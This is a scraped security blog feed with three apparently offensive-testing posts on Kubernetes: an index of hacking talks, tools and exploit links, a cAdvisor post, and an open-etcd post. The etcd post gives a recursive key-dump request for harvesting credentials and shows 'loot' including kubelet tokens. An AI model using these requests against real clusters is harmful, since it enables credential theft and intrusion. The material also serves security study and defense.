<span style="font-family: inherit;"><br /></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-85831037128157416352019-01-07T09:00:00.000-05:002019-07-21T12:57:27.212-04:00Kubernetes: Master Post<span style="font-family: inherit;">I have a few Kubernetes posts queued up and will make this the master post to index and give references for the topic. If i'm missing blog posts or useful resources ping me here or twitter.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Talks you should watch if you are interested in Kubernetes:</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div style="background: rgb(255, 255, 255); border: 0px; color: var(--ytd-video-primary-info-renderer-title-color, var(--yt-spec-text-primary)); line-height: 2.4rem; margin: 0px; max-height: 4.8rem; overflow: hidden; padding: 0px; text-shadow: var(--ytd-video-primary-info-renderer-title-text-shadow, none); transform: var(--ytd-video-primary-info-renderer-title-transform, none);">
<yt-formatted-string class="style-scope ytd-video-primary-info-renderer" style="--yt-endpoint-color: hsl(206.1, 79.3%, 52.7%);"><span style="font-family: inherit;"><b>Hacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesaman</b></span></yt-formatted-string></div>
<a href="https://www.youtube.com/watch?v=vTgQLzeBfRU" target="_blank"><span style="font-family: inherit;">https://www.youtube.com/watch?v=vTgQLzeBfRU</span></a><br />
<a href="https://github.com/bgeesaman/" target="_blank"><span style="font-family: inherit;">https://github.com/bgeesaman/</span></a><br />
<span style="font-family: inherit;"><a href="https://github.com/bgeesaman/hhkbe" target="_blank">https://github.com/bgeesaman/hhkbe</a> [demos for the talk above]</span><br />
<span style="font-family: inherit;"><a href="https://schd.ws/hosted_files/kccncna17/d8/Hacking%20and%20Hardening%20Kubernetes%20By%20Example%20v2.pdf" target="_blank">https://schd.ws/hosted_files/kccncna17/d8/Hacking%20and%20Hardening%20Kubernetes%20By%20Example%20v2.pdf</a> [slide deck]</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div style="background: rgb(255, 255, 255); border: 0px; color: var(--ytd-video-primary-info-renderer-title-color, var(--yt-spec-text-primary)); line-height: 2.4rem; margin: 0px; max-height: 4.8rem; overflow: hidden; padding: 0px; text-shadow: var(--ytd-video-primary-info-renderer-title-text-shadow, none); transform: var(--ytd-video-primary-info-renderer-title-transform, none);">
<yt-formatted-string class="style-scope ytd-video-primary-info-renderer" style="--yt-endpoint-color: hsl(206.1, 79.3%, 52.7%);"><span style="font-family: inherit;"><b>Perfect Storm Taking the Helm of Kubernetes Ian Coldwater</b></span></yt-formatted-string></div>
<a href="https://www.youtube.com/watch?v=1k-GIDXgfLw" target="_blank"><span style="font-family: inherit;">https://www.youtube.com/watch?v=1k-GIDXgfLw</span></a><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div style="background: rgb(255 , 255 , 255); border: 0px; display: block; font-style: normal; letter-spacing: normal; line-height: 2.4rem; margin: 0px; max-height: 4.8rem; overflow: hidden; padding: 0px; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<yt-formatted-string class="style-scope ytd-video-primary-info-renderer" style="--yt-endpoint-color: hsl(206.1, 79.3%, 52.7%);"><span style="font-family: inherit; font-size: small;"><b>A Hacker's Guide to Kubernetes and the Cloud - Rory McCune</b></span></yt-formatted-string></div>
<div style="background: rgb(255 , 255 , 255); border: 0px; display: block; font-style: normal; letter-spacing: normal; line-height: 2.4rem; margin: 0px; max-height: 4.8rem; overflow: hidden; padding: 0px; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<a href="https://www.youtube.com/watch?v=dxKpCO2dAy8" target="_blank"><span style="font-family: inherit;">https://www.youtube.com/watch?v=dxKpCO2dAy8</span></a></div>
<div style="background: rgb(255 , 255 , 255); border: 0px; display: block; font-style: normal; letter-spacing: normal; line-height: 2.4rem; margin: 0px; max-height: 4.8rem; overflow: hidden; padding: 0px; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<yt-formatted-string class="style-scope ytd-video-primary-info-renderer" style="--yt-endpoint-color: hsl(206.1, 79.3%, 52.7%);"><span style="font-family: inherit; font-size: small;"><b>Shipping in Pirate-Infested Waters: Practical Attack and Defense in Kubernetes</b></span></yt-formatted-string></div>
<a href="https://www.youtube.com/watch?v=ohTq0no0ZVU" target="_blank"><span style="font-family: inherit;">https://www.youtube.com/watch?v=ohTq0no0ZVU</span></a><br />
<br />
<br />
Blog posts by others:<br />
<br />
<a href="https://techbeacon.com/hackers-guide-kubernetes-security" target="_blank">https://techbeacon.com/hackers-guide-kubernetes-security</a><br />
<a href="https://elweb.co/the-security-footgun-in-etcd/" target="_blank">https://elweb.co/the-security-footgun-in-etcd/</a><br />
<a href="https://www.4armed.com/blog/hacking-kubelet-on-gke/" target="_blank">https://www.4armed.com/blog/hacking-kubelet-on-gke/</a><br />
<a href="https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/" target="_blank">https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/</a><br />
<a href="https://www.4armed.com/blog/hacking-digitalocean-kubernetes/" target="_blank">https://www.4armed.com/blog/hacking-digitalocean-kubernetes/</a><br />
<a href="https://github.com/freach/kubernetes-security-best-practice" target="_blank">https://github.com/freach/kubernetes-security-best-practice</a><br />
<a href="https://neuvector.com/container-security/kubernetes-security-guide/" target="_blank">https://neuvector.com/container-security/kubernetes-security-guide/</a><br />
<a href="https://medium.com/@pczarkowski/the-kubernetes-api-call-is-coming-from-inside-the-cluster-f1a115bd2066" target="_blank">https://medium.com/@pczarkowski/the-kubernetes-api-call-is-coming-from-inside-the-cluster-f1a115bd2066</a><br />
<a href="https://blog.intothesymmetry.com/2018/12/persistent-xsrf-on-kubernetes-dashboard.html" target="_blank">https://blog.intothesymmetry.com/2018/12/persistent-xsrf-on-kubernetes-dashboard.html</a><br />
<a href="https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/" target="_blank">https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/</a><br />
<a href="https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/" target="_blank">https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/</a><br />
<a href="https://raesene.github.io/blog/2017/04/02/Kubernetes-Service-Tokens/" target="_blank">https://raesene.github.io/blog/2017/04/02/Kubernetes-Service-Tokens/</a><br />
<a href="https://www.cyberark.com/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions/" target="_blank">https://www.cyberark.com/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions/</a><br />
<a href="https://labs.mwrinfosecurity.com/blog/attacking-kubernetes-through-kubelet/" target="_blank">https://labs.mwrinfosecurity.com/blog/attacking-kubernetes-through-kubelet/</a><br />
<a href="https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/" target="_blank">https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/</a><br />
<br />
<br />
Auditing tools<br />
<br />
<a href="https://github.com/Shopify/kubeaudit" target="_blank">https://github.com/Shopify/kubeaudit</a><br />
<a href="https://github.com/aquasecurity/kube-bench" target="_blank">https://github.com/aquasecurity/kube-bench</a><br />
<a href="https://github.com/aquasecurity/kube-hunter" target="_blank">https://github.com/aquasecurity/kube-hunter</a><br />
<br />
CVE-2018-1002105 resources<br />
<br />
<a href="https://blog.appsecco.com/analysing-and-exploiting-kubernetes-apiserver-vulnerability-cve-2018-1002105-3150d97b24bb" target="_blank">https://blog.appsecco.com/analysing-and-exploiting-kubernetes-apiserver-vulnerability-cve-2018-1002105-3150d97b24bb</a><br />
<a href="https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/" target="_blank">https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/</a><br />
<a href="https://github.com/gravitational/cve-2018-1002105" target="_blank">https://github.com/gravitational/cve-2018-1002105</a><br />
<a href="https://github.com/evict/poc_CVE-2018-1002105" target="_blank">https://github.com/evict/poc_CVE-2018-1002105</a><br />
<br />
CG Posts:<br />
<br />
Open Etcd: <a href="http://carnal0wnage.attackresearch.com/2019/01/kubernetes-open-etcd.html" target="_blank">http://carnal0wnage.attackresearch.com/2019/01/kubernetes-open-etcd.html</a><br />
Etcd with kube-hunter: <a href="http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunterpy-etcd.html" target="_blank">http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunterpy-etcd.html</a><br />
cAdvisor: <a href="http://carnal0wnage.attackresearch.com/2019/01/kubernetes-cadvisor.html" target="_blank">http://carnal0wnage.attackresearch.com/2019/01/kubernetes-cadvisor.html</a><br />
<br />
Kubernetes ports: <a href="https://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html</a><br />
Kubernetes dashboards: <a href="http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubernetes-dashboard.html" target="_blank">http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubernetes-dashboard.html</a><br />
Kublet 10255: h<a href="ttps://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html" target="_blank">ttps://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html</a><br />
Kublet 10250<br />
- Container Logs: <a href="http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubelet-api-containerlogs.html" target="_blank">http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubelet-api-containerlogs.html</a><br />
- Getting shellz 1: <a href="https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html</a><br />
- Getting shellz 2: <a href="https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html</a><br />
<br />
<br />
Cloud Metadata Urls and Kubernetes<br />
<br />
<br />
-I'll update as they get posted<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-26415455500710084312019-01-06T09:00:00.002-05:002019-01-07T09:41:34.478-05:00Kubernetes: cAdvisor<span style="font-family: inherit;"><b style="background-color: white; color: #222222; font-size: 16px;">"cAdvisor</b><span style="background-color: white; color: #222222; font-size: 16px;"> (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers."</span></span><br />
<span style="background-color: white; color: #222222; font-size: 16px;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: white; color: #222222; font-size: 16px;"><span style="font-family: inherit;">runs on port 4194</span></span><br />
<span style="background-color: white; color: #222222; font-size: 16px;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: white; color: #222222; font-size: 16px;"><span style="font-family: inherit;">Links:</span></span><br />
<span style="font-family: inherit;"><a href="https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/" target="_blank">https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/</a></span><br />
<span style="font-family: inherit;"><a href="https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/" target="_blank">https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/</a></span><br />
<br />
What do you get?<br />
<br />
information disclosure about metrics of the containers.<br />
<br />
Example request to hit the API and dump data:<br />
<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "monaco" , "menlo" , "consolas" , "courier new" , monospace; font-size: 12.6px; white-space: nowrap;">http://1.2.3.4:4194/api/v2.0/spec?recursive=true</span><br />
<br />
Screenshots<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHG0VFa42OGOPc8QAo3YjFrqIiMmQn3Y1TZs1FvXp-5V8WJPOCzebS9YfYS1r46SvsuzWx9UjWbL8LRqofvMvNWKSmUjT_hYcwkCeQeKBkWHtLFt2Wtxta01rl8XewiPRJ_IVpKFKEs7c/s1600/cadvisor1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="818" data-original-width="1600" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHG0VFa42OGOPc8QAo3YjFrqIiMmQn3Y1TZs1FvXp-5V8WJPOCzebS9YfYS1r46SvsuzWx9UjWbL8LRqofvMvNWKSmUjT_hYcwkCeQeKBkWHtLFt2Wtxta01rl8XewiPRJ_IVpKFKEs7c/s400/cadvisor1.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqGfimubYxxvr2lOerREzcQoYet7mOp3aFGpT9RmLKjqzSBcds_KGJHL_Q_37Fdo7mNFmoRlYxkBrMTS049aQ0gJbtHmTrlPsKxoabZNvEZuPCVUf-CT1Evs3Q3OEu75xTf4XiZlgQqdg/s1600/cadvisor2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="923" data-original-width="1600" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqGfimubYxxvr2lOerREzcQoYet7mOp3aFGpT9RmLKjqzSBcds_KGJHL_Q_37Fdo7mNFmoRlYxkBrMTS049aQ0gJbtHmTrlPsKxoabZNvEZuPCVUf-CT1Evs3Q3OEu75xTf4XiZlgQqdg/s400/cadvisor2.png" width="400" /></a></div>
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-43319651129676792262019-01-06T09:00:00.001-05:002019-01-07T09:41:12.410-05:00Kubernetes: open etcd <span style="font-family: inherit;">Quick post on <span style="background-color: white;">Kubernetes and open etcd (port 2379)</span></span><br />
<span style="background-color: white;"><span style="font-family: inherit;"><br /></span></span>
<span style="font-family: inherit;">"<a href="https://coreos.com/etcd" style="background-color: white; box-sizing: border-box; letter-spacing: 0.1px; text-decoration-line: none;" target="_blank">etcd</a><span style="background-color: white; letter-spacing: 0.1px;"> is a distributed key-value store. In fact, etcd is the primary datastore of Kubernetes; storing and replicating all Kubernetes cluster state. As a critical component of a Kubernetes cluster having a reliable automated approach to its configuration and management is imperative."</span></span><br />
<span style="background-color: white; letter-spacing: 0.1px;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: white; letter-spacing: 0.1px;"><span style="font-family: inherit;">-from: <a href="https://coreos.com/blog/introducing-the-etcd-operator.html" target="_blank">https://coreos.com/blog/introducing-the-etcd-operator.html </a></span></span><br />
<span style="background-color: white; letter-spacing: 0.1px;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: white; letter-spacing: 0.1px;"><span style="font-family: inherit;">What this means in english is that etcd stores the current state of the Kubernetes cluster usually including the kubernetes tokens and passwords. If you check out the following references you can get a sense for the pain level that could potentially be involved. At minimum you can get network info or running pods and at best credentials.</span></span><br />
<span style="background-color: white; letter-spacing: 0.1px;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: white; text-size-adjust: auto;"><span style="font-family: inherit;">refs: </span></span><br />
<a href="https://techbeacon.com/hackers-guide-kubernetes-security" style="background-color: white; font-family: inherit;" target="_blank">https://techbeacon.com/hackers-guide-kubernetes-security</a><span style="background-color: white; font-family: inherit;"> </span><br />
<span style="background-color: white; text-size-adjust: auto;"><span style="font-family: inherit;"><a href="https://elweb.co/the-security-footgun-in-etcd/" target="_blank">https://elweb.co/the-security-footgun-in-etcd/</a></span></span><br />
<span style="background-color: white; text-size-adjust: auto;"><a href="https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/" target="_blank">https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/</a></span><br />
<span style="background-color: white; text-size-adjust: auto;"><br /></span>
<span style="background-color: white; text-size-adjust: auto;">the second link talks extensively around types of info the found when they hit all the shodan endpoints for 2379 and did some analysis on the results.</span><br />
<span style="background-color: #f8f8f8; font-family: "helvetica" , "arial" , sans-serif; font-size: 14px; white-space: nowrap;"><br /></span>
<span style="background-color: white; white-space: nowrap;"><span style="font-family: inherit;">If you manage to find open etcd the easiest way to check for creds is to just do a curl request for:</span></span><br />
<span style="background-color: white; white-space: nowrap;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: white; white-space: nowrap;"><span style="font-family: "courier new" , "courier" , monospace;">GET http://ip_address:2379/v2/keys/?recursive=true</span></span><br />
<span style="background-color: white; white-space: nowrap;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: white; white-space: nowrap;"><span style="font-family: inherit;">Example Loot - </span></span><br />
<br />
<span style="background-color: white; white-space: nowrap;">Usually it's boring stuff like this:</span><br />
<span style="background-color: white; white-space: nowrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW2jG4div9KO_lmuaygTwCi6ykcAoB-NiZZ6y7yLmhOwjMVz8NN-O3VKE78RttO93cO-hX7RcxFe2qroALJ15h0TvZDb7qDbL_qhDi9Fbd9vn5U2XNGubhDXJDhCvDLGCOD3jlxOX40u0/s1600/etcd2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="304" data-original-width="1600" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW2jG4div9KO_lmuaygTwCi6ykcAoB-NiZZ6y7yLmhOwjMVz8NN-O3VKE78RttO93cO-hX7RcxFe2qroALJ15h0TvZDb7qDbL_qhDi9Fbd9vn5U2XNGubhDXJDhCvDLGCOD3jlxOX40u0/s640/etcd2.png" width="640" /></a></div>
<span style="background-color: white; white-space: nowrap;"><br /></span>
<span style="background-color: white; white-space: nowrap;">But occasionally you'll get more interesting things like:</span><br />
<span style="background-color: white; white-space: nowrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPOuKOTRhwmEQYZwVYXtDtkaqYqkAzEFmqKZzFiRFPa8IZJJNNtMuPAvPLVTxIvUHW-wLqMtucIbn7RIuMlt22aT-4GI9qUgdvTFBJMK2AhYcqSlXuk4309NyHIarQqZcxfSLM01TNNdI/s1600/etcd3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="1600" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPOuKOTRhwmEQYZwVYXtDtkaqYqkAzEFmqKZzFiRFPa8IZJJNNtMuPAvPLVTxIvUHW-wLqMtucIbn7RIuMlt22aT-4GI9qUgdvTFBJMK2AhYcqSlXuk4309NyHIarQqZcxfSLM01TNNdI/s640/etcd3.png" width="640" /></a></div>
<span style="background-color: white; white-space: nowrap;"><br /></span>
<span style="background-color: white; white-space: nowrap;">or more fun things like kublet tokens:</span><br />
<span style="background-color: white; white-space: nowrap;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwsDZfs0wDDqUMejegIcpu6OYM58gSWEtPvCbitBUPUlY-c-2i-xtIZO3ezeHMTm4EiNqInypDpPOA96gLQlGPbzcd8MG1kBMsNMFQ0OqUYKy7ee9-6nD_oiDGhSv0JYPDatf_3WlOGQk/s1600/etcd1+copy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="745" data-original-width="1600" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwsDZfs0wDDqUMejegIcpu6OYM58gSWEtPvCbitBUPUlY-c-2i-xtIZO3ezeHMTm4EiNqInypDpPOA96gLQlGPbzcd8MG1kBMsNMFQ0OqUYKy7ee9-6nD_oiDGhSv0JYPDatf_3WlOGQk/s640/etcd1+copy.png" width="640" /></a></div>
<span style="background-color: white; white-space: nowrap;"><br /></span>
<span style="background-color: white; white-space: nowrap;"><br /></span>Unknownnoreply@blogger.com0